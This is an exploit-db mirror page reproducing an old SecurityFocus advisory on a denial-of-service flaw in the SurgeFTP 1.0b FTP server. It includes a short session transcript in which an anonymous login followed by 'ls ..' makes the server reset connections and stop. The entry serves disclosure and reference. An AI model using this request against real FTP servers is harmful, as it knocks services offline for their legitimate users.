bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/20659.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/2442/info
SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms.
A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.
Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server.
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
Reference in a new issue View git blame Copy permalink